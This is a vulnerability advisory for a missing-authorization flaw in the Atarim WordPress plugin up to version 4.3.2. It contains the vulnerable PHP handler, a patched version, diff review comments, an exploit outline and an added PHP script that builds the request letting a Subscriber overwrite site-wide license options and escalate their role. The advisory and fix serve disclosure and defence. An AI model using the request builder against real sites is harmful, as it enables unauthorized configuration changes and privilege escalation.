Atarim <= 4.3.2 - Missing Authorization
Description
The Atarim plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Technical Details
Affected versions: <= 4.3.2
What Changed in the Fix
Changes introduced in v4.3.3
Source Code
WordPress.org SVN
Exploitation Research Plan - CVE-2026-32447
1. Vulnerability Summary
The Atarim – Visual Feedback, Review & AI Collaboration plugin (v4.3.2 and below) contains a Missing Authorization vulnerability. The vulnerability exists because certain sensitive functions, specifically those related to license activation and settings updates, fail to perform sufficient capability checks. While the code includes checks like is_user_logged_in() and a custom avc_allowed_user_role() check, these do not properly restrict access to administrative users (e.g., those with manage_options). This allows authenticated users with low privileges, such as Subscribers, to trigger administrative actions like updating the plugin's license, changing site settings, or elevating their own plugin-specific user role to "webmaster."
2. Attack Vector Analysis
- Vulnerable Hook: init
- Vulnerable Function: AVC_Settings::avc_license_activation()
- HTTP Parameter(s):
  - atarim_response (the new license key, base64 encoded)
  - page (a base64 encoded string containing the nonce in atarim_state)
  - site_id (the site ID)
- Authentication Level: Subscriber (Authenticated)
- Preconditions: The attacker must obtain a valid nonce for the action avc_new_license_activation. In Atarim, this nonce is often
Summary
The Atarim plugin (<= 4.3.2) fails to perform a capability check in the avc_license_activation function, which is triggered via the init hook. This allows authenticated users with subscriber-level permissions to update sensitive plugin options, such as the license key and site ID, and elevate their own plugin-specific status to 'webmaster'.
Vulnerable Code
```php
// admin/class-avc-settings.php lines 73-125
public function avc_license_activation() {
    if (! isset($_GET['atarim_response'])) {
        return;
    }
    // Gate: admin-area request, logged in, plugin role check, page param present.
    // No current_user_can() check: any user accepted by avc_allowed_user_role() passes.
    if (
        ! is_admin()
        || ! is_user_logged_in()
        || ! $this->function->avc_allowed_user_role()
        || ! isset($_GET['page'])
    ) {
        wp_safe_redirect(AVC_HOME_URL);
        exit;
    }
    // `page` is a base64 container for a query string carrying the slug and the nonce.
    $page_raw = sanitize_text_field(wp_unslash($_GET['page']));
    $page_decoded = base64_decode($page_raw, true);
    if (false === $page_decoded) {
        wp_safe_redirect(AVC_HOME_URL);
        exit;
    }
    $parsed = [];
    parse_str('page=' . $page_decoded, $parsed);
    $page_slug = isset($parsed['page']) ? $parsed['page'] : '';
    $atarim_state = isset($parsed['atarim_state']) ? $parsed['atarim_state'] : '';
    if ('atarim-visual-collaboration' !== $page_slug) {
        wp_safe_redirect(AVC_HOME_URL);
        exit;
    }
    // Verify nonce / state.
    if ( empty( $atarim_state ) || ! wp_verify_nonce( $atarim_state, 'avc_new_license_activation' ) ) {
        wp_safe_redirect(AVC_HOME_URL);
        exit;
    }
    if (strpos($_GET['atarim_response'], '%3D') !== false) {
        $atarim_response = substr($_GET['atarim_response'], -1, 3);
    } else {
        $atarim_response = $_GET['atarim_response'];
    }
    // Site-wide option writes and the per-user role escalation, reachable by any user who passed the gate above.
    $user_id = $this->function->avc_get_user_detail('id');
    $this->function->avc_update_settings('avc_license', base64_decode(sanitize_text_field($atarim_response)));
    $avc_site_id = sanitize_text_field($_GET['site_id']);
    $this->function->avc_update_settings('avc_site_id', $avc_site_id);
    $this->function->avc_update_settings('avc_initial_setup_complete', 'yes');
    $this->function->avc_update_settings('avc_collab_active', 'yes');
    update_user_meta($user_id, 'avc_user_type', 'webmaster', false);
    $this->function->avc_get_whitelabel();
    wp_safe_redirect(AVC_HOME_URL);
    exit();
}
```
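For comparison, the same handler with the authorization check placed first. This is an added example, not the vendor's 4.3.3 code (the page does not show the fix itself); it replaces the method inside AVC_Settings, runs only within WordPress, and assumes the plugin helpers $this->function->avc_get_user_detail(), avc_update_settings() and avc_get_whitelabel() and the constant AVC_HOME_URL keep the signatures used above.

```php
// Added example: avc_license_activation() with an explicit capability check.
// Method of AVC_Settings; plugin helpers and AVC_HOME_URL are assumed unchanged.
public function avc_license_activation() {
    if ( ! isset( $_GET['atarim_response'] ) ) {
        return;
    }

    // Authorization first. is_admin() is true for any request under /wp-admin/,
    // which a Subscriber can reach (profile.php, for example), and a nonce only
    // proves the request came from a page rendered for this user's session.
    // Neither says the user may change site-wide options, so require
    // manage_options, the capability WordPress uses for plugin settings screens.
    if (
        ! is_admin()
        || ! is_user_logged_in()
        || ! current_user_can( 'manage_options' )
        || ! isset( $_GET['page'], $_GET['site_id'] )
    ) {
        wp_safe_redirect( AVC_HOME_URL );
        exit;
    }

    // Decode the `page` container the same way the original does.
    $page_raw     = sanitize_text_field( wp_unslash( $_GET['page'] ) );
    $page_decoded = base64_decode( $page_raw, true );
    if ( false === $page_decoded ) {
        wp_safe_redirect( AVC_HOME_URL );
        exit;
    }
    $parsed = [];
    parse_str( 'page=' . $page_decoded, $parsed );
    $page_slug    = isset( $parsed['page'] ) ? $parsed['page'] : '';
    $atarim_state = isset( $parsed['atarim_state'] ) ? $parsed['atarim_state'] : '';
    if ( 'atarim-visual-collaboration' !== $page_slug ) {
        wp_safe_redirect( AVC_HOME_URL );
        exit;
    }

    // CSRF protection, kept as a second, independent layer: wp_verify_nonce()
    // binds the token to the current user's session, so it is an anti-CSRF
    // check and not a substitute for the capability check above.
    if ( '' === $atarim_state || ! wp_verify_nonce( $atarim_state, 'avc_new_license_activation' ) ) {
        wp_safe_redirect( AVC_HOME_URL );
        exit;
    }

    // PHP percent-decodes query values before populating $_GET, so the
    // original '%3D' special case is not reproduced; decode the license once.
    $license = base64_decode( sanitize_text_field( wp_unslash( $_GET['atarim_response'] ) ), true );
    if ( false === $license ) {
        wp_safe_redirect( AVC_HOME_URL );
        exit;
    }

    $user_id = $this->function->avc_get_user_detail( 'id' );
    $this->function->avc_update_settings( 'avc_license', $license );
    $this->function->avc_update_settings( 'avc_site_id', sanitize_text_field( wp_unslash( $_GET['site_id'] ) ) );
    $this->function->avc_update_settings( 'avc_initial_setup_complete', 'yes' );
    $this->function->avc_update_settings( 'avc_collab_active', 'yes' );
    update_user_meta( $user_id, 'avc_user_type', 'webmaster', false );
    $this->function->avc_get_whitelabel();
    wp_safe_redirect( AVC_HOME_URL );
    exit;
}
```

The order matters: the capability check runs before any request data is parsed, so a low-privilege user is turned away without reaching the nonce logic or the option writes. Keeping wp_verify_nonce() as well still protects an administrator from being tricked into activating a license through a forged link.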
Security Fix
Only in /home/deploy/wp-safety.org/data/plugin-versions/atarim-visual-collaboration/4.3.3/admin: class-avcf-settings.php Only in /home/deploy/wp-safety.org/data/plugin-versions/atarim-visual-collaboration/4.3.2/admin: class-avc-settings.php @@ -3,7 +3,7 @@ exit; } -class AVC_User_Meta { +class AVCF_User_Meta { public function __construct() { // Display checkbox add_action('show_user_profile', [$this, 'add_webmaster_checkbox']); @@ -51,7 +51,7 @@ return; } - if (isset($_POST['avc_user_type']) && $_POST['avc_user_type'] === 'webmaster') { + if (isset($_POST['avc_user_type']) && sanitize_text_field(wp_unslash($_POST['avc_user_type'])) === 'webmaster') { update_user_meta($user_id, 'avc_user_type', 'webmaster'); } else { delete_user_meta($user_id, 'avc_user_type'); @@ -59,4 +59,4 @@ } } -new AVC_User_Meta(); \ No newline at end of file +new AVCF_User_Meta();
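Review bot: the change at `@@ -51,7 +51,7 @@` only sanitizes `$_POST['avc_user_type']` before comparing it to `'webmaster'`; it adds no authorization, and the only guard visible above it is the bare `return;`, whose condition lies outside the shown context. This hunk sets the same `avc_user_type` meta that the vulnerable `avc_license_activation()` writes, so please include the lines that decide that `return;` (a `current_user_can( 'edit_user', $user_id )` check is the usual guard on a profile-form save), and include the corresponding change to `avc_license_activation()` with its capability check, since the advisory's missing authorization is not addressed anywhere in this diff.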
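Review bot: the `@@ -3,7 +3,7 @@` and `@@ -59,4 +59,4 @@` hunks are a prefix rename (`AVC_User_Meta` to `AVCF_User_Meta`, `new AVCF_User_Meta();`) with no security effect, and the two `Only in` lines show why the real fix is absent: `class-avc-settings.php` in 4.3.2 was renamed to `class-avcf-settings.php` in 4.3.3, so a directory diff never paired the two settings files. Re-run the comparison with the renamed pair matched explicitly (`diff 4.3.2/admin/class-avc-settings.php 4.3.3/admin/class-avcf-settings.php`) so the change to `avc_license_activation()` becomes visible; the `\ No newline at end of file` marker on the 4.3.2 side is cosmetic and can stay.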
Exploit Outline
To exploit this vulnerability, an attacker first authenticates as a Subscriber and retrieves a valid nonce for the 'avc_new_license_activation' action. Because wp_verify_nonce() ties a nonce to the session of the user it was generated for, the nonce must be one issued to the attacker's own login; it does not need to come from an administrator. The attacker then constructs a GET request to a URL under /wp-admin/ (is_admin() only tests that the request targets the admin area, not the user's capabilities, and a Subscriber can open pages such as profile.php) with the parameters 'atarim_response' (a base64-encoded dummy license), 'site_id', and a base64-encoded 'page' value that decodes to a query string carrying the slug 'atarim-visual-collaboration' and the nonce in 'atarim_state'. Because the plugin relies on is_admin() and the custom role check avc_allowed_user_role() instead of current_user_can('manage_options'), avc_license_activation() runs on the init hook, overwrites the site-wide avc_license and avc_site_id options, marks the initial setup as complete, and sets the attacker's 'avc_user_type' meta to 'webmaster'.
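The request construction above, as an added example that is not part of the original advisory or the plugin: a stand-alone PHP CLI script that builds the `page` container and the full URL, and decodes `page` exactly the way the vulnerable handler does so the encoding can be checked offline. The site URL, nonce, license string and site ID are constructed placeholders; a real nonce has to be obtained from the attacker's own session as described above.

```php
<?php
// Added example (not from the page or the plugin). Run with: php build_request.php

// The handler base64-decodes `page` and runs parse_str('page=' . decoded),
// so the decoded text must be a query string whose first value is the slug
// and which carries the nonce under `atarim_state`.
function build_page_param( string $nonce, string $slug = 'atarim-visual-collaboration' ): string {
    return base64_encode( $slug . '&' . http_build_query( [ 'atarim_state' => $nonce ] ) );
}

// Full URL. http_build_query() percent-encodes the '+', '/' and '=' of base64,
// so the values survive PHP's decoding into $_GET unchanged. Any path under
// /wp-admin/ satisfies is_admin(); profile.php is reachable by a Subscriber.
function build_request_url( string $site, string $nonce, string $license, string $site_id ): string {
    $query = http_build_query( [
        'page'            => build_page_param( $nonce ),
        'atarim_response' => base64_encode( $license ),
        'site_id'         => $site_id,
    ] );
    return rtrim( $site, '/' ) . '/wp-admin/profile.php?' . $query;
}

// Mirror of the handler's decoding of `page` (strict base64, then parse_str),
// used here to confirm the container decodes to the slug and nonce the
// handler expects. Returns null where the handler would redirect away.
function decode_page_param( string $page_raw ): ?array {
    $decoded = base64_decode( $page_raw, true );
    if ( false === $decoded ) {
        return null;
    }
    $parsed = [];
    parse_str( 'page=' . $decoded, $parsed );
    return [
        'page'         => isset( $parsed['page'] ) ? $parsed['page'] : '',
        'atarim_state' => isset( $parsed['atarim_state'] ) ? $parsed['atarim_state'] : '',
    ];
}

// Constructed placeholder values.
$nonce = 'a1b2c3d4e5';
$url   = build_request_url( 'https://victim.example', $nonce, 'dummy-license', '12345' );
echo $url, PHP_EOL;

// Round-trip check against the handler's own decoding logic.
$check = decode_page_param( build_page_param( $nonce ) );
if ( 'atarim-visual-collaboration' !== $check['page'] || $nonce !== $check['atarim_state'] ) {
    fwrite( STDERR, "page container does not decode as the handler expects\n" );
    exit( 1 );
}
echo 'page container decodes to slug and nonce as expected', PHP_EOL;
```

One detail worth knowing when reading the vulnerable code: PHP decodes percent-encoding before filling $_GET, so the handler's strpos($_GET['atarim_response'], '%3D') branch is not taken for a normally encoded request and the full base64 license string is used; that branch (which would keep only the last character via substr(..., -1, 3)) only matters if the value is double-encoded.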